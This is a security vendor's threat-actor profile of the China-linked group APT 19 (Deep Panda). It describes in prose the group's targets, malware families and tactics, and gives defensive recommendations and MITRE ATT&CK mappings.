Trending

ee-track">
Link copied!

Table of Contents

APT 19 | Cyble

Threat Actor Profile: APT 19 

APT 19 is a long-running and highly adaptive threat group, with a wide collection of aliases including Deep Panda, Shell Crew, KungFu Kittens, WebMasters, and PinkPanther. While primarily operating out of China, APT 19’s influence is global, with a particular focus on critical sectors such as defense, energy, finance, pharmaceuticals, telecommunications, and law. 

Their operations blend traditional espionage with cybercrime tactics. They have been linked to major data breaches involving U.S. healthcare giants and are known for deploying highly targeted phishing campaigns and custom malware to exfiltrate sensitive data. 

APT 19 typically initiates attacks via spearphishing emails loaded with malicious attachments, usually in RTF or XLSM formats. Once inside a network, they rely on PowerShell, Windows Management Instrumentation (WMI), and other scripting methods to execute payloads, move laterally, and establish persistence. One of their more notable initial access methods was a watering hole attack on Forbes.com in 2014. 

A common scenario might involve phishing employees at a defense contractor, deploying malware to infiltrate secure systems, extracting classified project data, and transmitting it to offshore servers. That data can then be exploited for espionage or sold on the dark web for financial gain, while the attackers stay hidden behind layers of encryption and stealthy malware. 

Target Regions  

image 23
Cyble Vision Threat Library (Source: Cyble Vision)    

While APT 19 operates on a global scale, its activities have consistently shown a strong focus on specific geographic regions. Primary among these are the United States, Australia, and various parts of East Asia. The group’s campaigns often reflect priorities aligned with Chinese national interests, suggesting a hybrid model of cyber operations that blends freelancer-driven efforts with state-sponsored objectives. 

APT 19 has targeted a broad spectrum of industries. Notable target sectors include aerospace and defense, healthcare, government and law enforcement, telecommunications, and technology, all of which are commonly associated with national security and strategic value. 

Beyond those high-stakes areas, APT 19 has also launched campaigns against industries such as pharmaceuticals and biotechnology, education, energy and utilities, manufacturing, and construction. Their reach even extends into commercial sectors like banking, financial services, and insurance (BFSI), media and entertainment, agriculture and livestock, food and beverages, and organizational services. 

Known Malware Families and Toolset 

Malware Families Used by APT 19
Malware Families Used by APT 19 (Source: Cyble Vision)   

APT 19 maintains a highly advanced malware arsenal, employing at least nine known malware families designed for espionage, persistence, and stealth. These tools are strategically selected to facilitate lateral movement, command and control (C2), and data exfiltration across various compromised environments. 

Among the most commonly used tools is Cobalt Strike, a legitimate penetration testing suite frequently abused by threat actors for post-exploitation tasks, including lateral movement and C2 communications. APT 19 also utilizes a modified version known as Cobalt Strike Cat, which is popular among Chinese-speaking cybercrime forums and is engineered for enhanced evasion and persistence. 

Other tools in their arsenal include EmpireProject, a backdoor designed for command execution and remote control, and 9002 RAT, a Remote Access Trojan (RAT) typically deployed for surveillance and data theft. The group also uses C0d0so0, a custom backdoor with two known variants—one communicating over HTTP and the other using port 22. This malware compresses and encodes network traffic to avoid detection and bears similarities to the Derusbi malware, which is also deployed by APT 19. Derusbi is notable for its customized builds tailored to individual campaigns, particularly within Chinese cyber-espionage operations. 

Additional tools include EvilGrab RAT, which enables webcam access, file theft, and screen capture, and FormerFirstRAT, a remote access tool used to maintain persistence within the victim’s environment. Fire Chili, a stealthy rootkit signed with legitimate digital certificates, is used to bypass detection mechanisms and maintain kernel-level access. Lastly, Poison Ivy, a long-standing remote administration tool, is used for credential harvesting and continuous surveillance. 

Tactics, Techniques, and Procedures (TTPs) 

APT 19 uses a wide range of attack techniques throughout the different stages of a cyberattack. Their methods begin with gaining access through tactics like compromising trusted websites, a method seen in their past attack on Forbes.com, and sending targeted emails containing infected attachments such as Word or Excel files. 

Once inside a network, they execute their attacks using tools like PowerShell and command scripts to run malicious code. They also move laterally within networks by exploiting system tools and getting users to open harmful files. 

To maintain long-term access, APT 19 uses a range of persistence methods. These include placing hidden backdoors on web servers, manipulating the way systems load files to inject malicious code, and even exploiting features like “sticky keys” to bypass login screens. They also alter system settings, so their malware launches automatically when a device starts. 

To evade detection, the group disguises commands and payloads using encoding techniques, decrypts hidden information within its tools, and runs its malware through legitimate-looking software to avoid raising alarms. Its rootkits, such as Fire Chili, allow it to hide deep within systems without being noticed. 

APT 19 is also skilled at gathering information and cyberespionage. Once inside the network, the group scans for system details, connected machines, collects user data, and maps processes running on the network. 

When it comes to spreading through a system, they often use shared network folders and stolen credentials to move from one device to another. Finally, they communicate with their command servers using standard web traffic, often hiding their messages in encoded formats to avoid detection. 

Recommendations and Mitigations 

To defend against APT 19’s methods, organizations should implement: 

  • Block spearphishing emails with malicious RTF and Excel attachments using sandboxing and threat filters. 
  • Keep Microsoft Office, Windows, Adobe, and related applications up to date to close known vulnerabilities. 
  • Educate employees to recognize phishing emails, suspicious files, and common social engineering tactics. 
  • Detect and stop lateral movement, script-based execution, and unauthorized persistence mechanisms. 
  • Isolate critical systems and sensitive data to limit an attacker’s ability to move freely inside your network. 
  • Integrate real-time threat feeds and IOCs through platforms like Cyble to identify emerging threats early. 
  • Check for unauthorized registry edits, DLL hijacking, rogue services, or hidden malware like rootkits (e.g., Fire Chili). 

Conclusion 

APT 19 remains a persistent and dangerous cyber-espionage threat, targeting critical sectors with malware. Whether acting independently or with state support, the group continues to challenge global cybersecurity defenses. 

Organizations need more than basic security tools to protect against such threat actors. Cyble offers an integrated platform combining AI-driven threat intelligence, real-time monitoring, and rapid response. From dark web monitoring to vulnerability management and brand protection, Cyble empowers businesses to detect, mitigate, and respond to attacks proactively. 

Stay protected. Schedule a demo with Cyble today. 

MITRE ATT&CK Techniques Associated with APT 19 

MITRE ATT&CK Techniques
MITRE ATT&CK Techniques (Source: Cyble Vision)   
  • Initial Access (TA0001) – Drive-by Compromise (T1189): APT19 conducted a watering hole attack on forbes.com in 2014 to compromise targets. 
  • Spearphishing Attachment (T1566.001): APT19 sent spearphishing emails with malicious RTF and XLSM attachments to deliver initial exploits. 
  • Execution (TA0002) – Malicious File (T1204.002): APT19 attempts to get users to launch malicious attachments via spearphishing emails. 
  • Persistence (TA0003) – Web Shell (T1505.003): Deep Panda used web shells on publicly accessible servers to maintain access. 
  • DLL Search Order Hijacking (T1574.001): APT19 used a legitimate executable to launch HTTP and Port 22 malware variants via DLL hijacking. 
  • Defense Evasion (TA0005) – Command Obfuscation (T1027.010): APT19 used Base64 encoding to obfuscate executed commands. 
Discover how we help proactively defend against evolving threats with Gen 3 intelligence. Request a Demo today!

Share Post:

Subscribe to Cyble

Cyble protects your personal data to manage your account and deliver requested content. Submit your details to receive updates. Withdraw consent anytime. See our privacy policy for details.

Related Topics

Scroll to Top

Book your session

Request a Personalized Demo

See how Cyble's threat intelligence protects your organization. A specialist will reach out within one business day.

Select one or more options

Cyble protects your personal data to manage your account and deliver requested content. Submit your details to receive updates. Withdraw consent anytime. See our privacy policy for details.

Your information is encrypted and never shared.
SOC 2 Type II GDPR compliant Trusted by 1,000+ teams

Download the brochure

Get the Cyble Vision Brochure

Explore how Cyble Vision delivers AI-powered threat intelligence across your attack surface. Fill in your details to access the brochure.

Select one or more options

Cyble protects your personal data to manage your account and deliver requested content. Submit your details to receive updates. Withdraw consent anytime. See our privacy policy for details.

Your information is encrypted and never shared.
SOC 2 Type II GDPR compliant Trusted by 1,000+ teams